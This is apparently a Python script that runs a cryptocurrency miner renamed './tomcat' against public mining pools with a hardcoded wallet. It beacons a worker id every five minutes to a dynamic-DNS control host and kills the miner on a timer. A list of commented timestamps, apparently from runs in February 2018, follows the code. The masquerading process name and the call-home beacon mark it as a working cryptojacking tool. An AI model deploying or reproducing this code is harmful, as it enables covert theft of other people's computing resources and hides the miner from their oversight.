import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:49:06.263558
#2018-02-17 17:34:03.751742
#2018-02-17 19:22:04.220178
#2018-02-17 21:11:05.180623
#2018-02-17 22:55:05.658151
#2018-02-18 00:41:03.594938
#2018-02-18 02:30:03.352987
#2018-02-18 04:16:08.114550
#2018-02-18 06:08:05.347516
#2018-02-18 07:59:05.812779
#2018-02-18 09:47:04.815122
#2018-02-18 11:34:04.933757
#2018-02-18 13:19:04.217822
#2018-02-18 15:09:07.288589
#2018-02-18 16:57:01.507130
#2018-02-18 18:44:01.738912
#2018-02-18 20:30:09.481289
#2018-02-18 22:16:06.082475
#2018-02-19 00:05:06.462748
#2018-02-19 01:51:07.781767
#2018-02-19 03:38:05.310574
#2018-02-19 05:23:06.977351
#2018-02-19 07:12:04.007926
#2018-02-19 09:01:01.534652
#2018-02-19 10:48:09.474819
#2018-02-19 12:37:04.270541
#2018-02-19 14:25:06.462887
#2018-02-19 16:15:04.946364
#2018-02-19 18:01:09.475406
#2018-02-19 19:48:01.926102
#2018-02-19 21:35:04.328970
#2018-02-19 23:21:07.171464
#2018-02-20 01:07:04.950046
#2018-02-20 02:57:07.217368
#2018-02-20 04:46:06.560247
#2018-02-20 06:30:06.220065
#2018-02-20 08:15:05.728562
#2018-02-20 10:00:08.792523
#2018-02-20 11:44:06.041961
#2018-02-20 13:32:03.981529
#2018-02-20 15:16:01.328953
#2018-02-20 17:03:05.377966
#2018-02-20 18:50:12.747019
#2018-02-20 20:41:07.842188
#2018-02-20 22:25:08.318308
#2018-02-21 00:06:01.795809
#2018-02-21 01:50:01.332287
#2018-02-21 03:36:07.065188
#2018-02-21 05:25:01.444280
#2018-02-21 07:13:06.806088
#2018-02-21 08:59:06.419246
#2018-02-21 10:47:07.891569
#2018-02-21 12:35:05.025753
#2018-02-21 14:21:09.220145
#2018-02-21 16:08:09.346081
#2018-02-21 17:58:07.418533
#2018-02-21 19:43:07.248158
#2018-02-21 21:31:04.831958
#2018-02-21 23:16:01.930352
#2018-02-22 01:05:01.658891
#2018-02-22 02:52:06.758201
#2018-02-22 04:39:01.654727
#2018-02-22 06:23:04.733163
#2018-02-22 08:11:07.989605
#2018-02-22 09:59:01.646814
#2018-02-22 11:44:09.892187
#2018-02-22 13:31:06.118984
#2018-02-22 15:19:04.100031
#2018-02-22 17:03:06.226866
#2018-02-22 18:48:08.829987
#2018-02-22 20:41:03.339399
#2018-02-22 22:26:07.926284
#2018-02-23 00:12:05.736752
#2018-02-23 02:02:06.387468
#2018-02-23 03:50:07.807420
#2018-02-23 05:32:03.568330
#2018-02-23 07:18:06.676665
#2018-02-23 09:22:03.810792
#2018-02-23 11:28:07.271756
#2018-02-23 13:17:05.635261
#2018-02-23 15:05:09.234054
#2018-02-23 16:54:05.762857
#2018-02-23 18:45:02.203311
#2018-02-23 20:32:01.868003
#2018-02-23 22:19:01.736063
#2018-02-24 00:06:06.956201
#2018-02-24 01:57:06.609731
#2018-02-24 03:48:08.015961
#2018-02-24 05:31:06.784297
#2018-02-24 07:17:01.515279
#2018-02-24 09:07:05.881569
#2018-02-24 10:45:05.353680
#2018-02-24 12:28:01.974988
#2018-02-24 14:02:04.377662
#2018-02-24 15:41:03.817923
#2018-02-24 17:22:05.167337
#2018-02-24 18:53:06.068983
#2018-02-24 20:26:01.553391
#2018-02-24 21:56:07.456901
#2018-02-25 02:36:07.338471
#2018-02-25 06:19:06.293264
#2018-02-25 11:40:08.167001